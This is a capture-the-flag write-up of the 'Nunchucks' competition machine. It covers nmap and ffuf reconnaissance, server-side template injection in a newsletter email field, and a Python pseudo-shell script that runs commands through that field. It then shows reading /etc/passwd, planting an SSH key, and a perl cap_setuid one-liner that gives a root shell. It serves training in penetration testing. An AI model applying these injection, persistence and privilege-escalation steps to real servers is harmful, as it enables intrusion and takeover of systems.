Nunchucks
Introduction
![[Competition]](/assets/images/Pasted image 20211010231943.png)
IP: 54.208.212.226
Objective
The objective of this assessment is to perform a penetration test against the server. The pentester is tasked with following methodical approach in obtaining access to the objective goals. This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report.
Recommendations
I recommend patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date.
Pentesting
Nmap
| Server IP Address | Ports Open |
|---|---|
| 54.208.212.226 | TCP: 22, 80, 443 |
Nmap Scan Results:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# Nmap 7.91 scan initiated Sat Oct 9 07:11:11 2021 as: nmap -Pn -sCV -p22,80,443 -oN nmap/Basic_54.208.212.226.nmap 54.208.212.226
Nmap scan report for nunchucks.uhc (54.208.212.226)
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6c:14:6d:bb:74:59:c3:78:2e:48:f5:11:d8:5b:47:21 (RSA)
| 256 a2:f4:2c:42:74:65:a3:7c:26:dd:49:72:23:82:72:71 (ECDSA)
|_ 256 e1:8d:44:e7:21:6d:7c:13:2f:ea:3b:83:58:aa:02:b3 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://nunchucks.uhc/
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Nunchucks - Landing Page
| ssl-cert: Subject: commonName=nunchucks.htb/organizationName=Nunchucks-Certificates/stateOrProvinceName=Dorset/countryName=UK
| Subject Alternative Name: DNS:localhost, DNS:nunchucks.htb
| Not valid before: 2021-08-30T15:42:24
|_Not valid after: 2031-08-28T15:42:24
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
From the nmap scan, port 80 is redirected to https://nunchucks.uhc. Let’s add that to our hosts file.
1
2
3
cat /etc/hosts
54.208.212.226 nunchucks.uhc
Port 80, Port 443
Port 80 is redirected to 443.
![[Website Main Page]](/assets/images/Pasted image 20211010232416.png)
Scrolling through the page, we had a signup link.
![[Signup Page]](/assets/images/Pasted image 20211010232613.png)
When I tried to register, the server gave a reponse saying ** registrations are closed.**
Subdomain Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
kali@kali:$ ffuf -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -u https://nunchucks.uhc -H "Host: FUZZ.nunchucks.uhc" -fs 30589
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1
________________________________________________
:: Method : GET
:: URL : https://nunchucks.uhc
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.nunchucks.uhc
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 30589
________________________________________________
store [Status: 200, Size: 30589, Words: 12757, Lines: 547]
We have a new subdomain store.nunchucks.uhc
1
2
3
cat /etc/hosts
54.208.212.226 nunchucks.uhc nunchucks.htb store.nunchucks.uhc
![[Store Web Main Page]](/assets/images/Pasted image 20211010233800.png)
FLAG - 1
![[Flag-1]](/assets/images/Pasted image 20211010235725.png)
When I tried to subscribe for the newsletter, I got the same email which i entered in the response.
![[Newsletter Subscription]](/assets/images/Pasted image 20211010233941.png)
SSTI
Let’s intercept the request in burp and play with the input.
![[Intercepting in Burp Suite]](/assets/images/Pasted image 20211010234207.png)
I tried to injected some Template Code `````` and it was successfully executed and returned the value 49 which confirm SSTI.
![[SSTI in email field]](/assets/images/Pasted image 20211010234309.png)
Reference: http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine
Injecting Payload
1
2
3
![[Successful SSTI]](/assets/images/Pasted image 20211010234833.png)
We have RCE on the server, the response was not easy to read and I was lazy to go through so I made a simple python script which does my work and gives us a feeling of shell.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
import requests
import json
import warnings
"""
POST /api/submit HTTP/1.1
Host: store.nunchucks.uhc
Cookie: _csrf=xvbnCwBpmQYXDUQDfVN7qOgT
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://store.nunchucks.uhc/
Content-Type: application/json
Origin: https://store.nunchucks.uhc
Content-Length: 154
Te: trailers
Connection: close
{"email":"tinyb0y@pm.me,"
}
"""
URL = "https://store.nunchucks.uhc/api/submit"
while True:
COMMAND = raw_input(">>")
data = {"email" : "tinyb0y@pm.me,"}
r = requests.post(URL, json=data, verify=False)
json_data = json.loads(r.text)
output = json_data['response'].split(".com,")[1].strip().replace("'","'")
for line in output.splitlines():
print(line)
![[SSTI Python Pseudo Shell]](/assets/images/Pasted image 20211010235335.png)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
>>cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
david:x:1000:1000:david:/home/david:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
rtkit:x:113:117:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
geoclue:x:115:120::/var/lib/geoclue:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
cups-pk-helper:x:117:123:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
saned:x:118:124::/var/lib/saned:/usr/sbin/nologin
colord:x:119:125:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
pulse:x:120:126:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
mysql:x:121:128:MySQL Server,,,:/nonexistent:/bin/false
We are running as user david
FLAG - 2
1
2
>>cat /home/david/user.txt
UHC{s5st1-@ll-day}
![[Adding SSH Key]](/assets/images/Pasted image 20211010235913.png)
Adding our ssh key to the server.
Logging in as david
![[Login as David User]](/assets/images/Pasted image 20211010235956.png)
Priv Esc
Uploaded linpeas.sh and found perl is set with capabiliities(cap_setuid)
![[Perl Setuid]](/assets/images/Pasted image 20211011000317.png)
1
/usr/bin/perl5.30.0 -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
![[Root Shell]](/assets/images/Pasted image 20211011000707.png)
FLAG - 3
![[Third Flag]](/assets/images/Pasted image 20211011000729.png)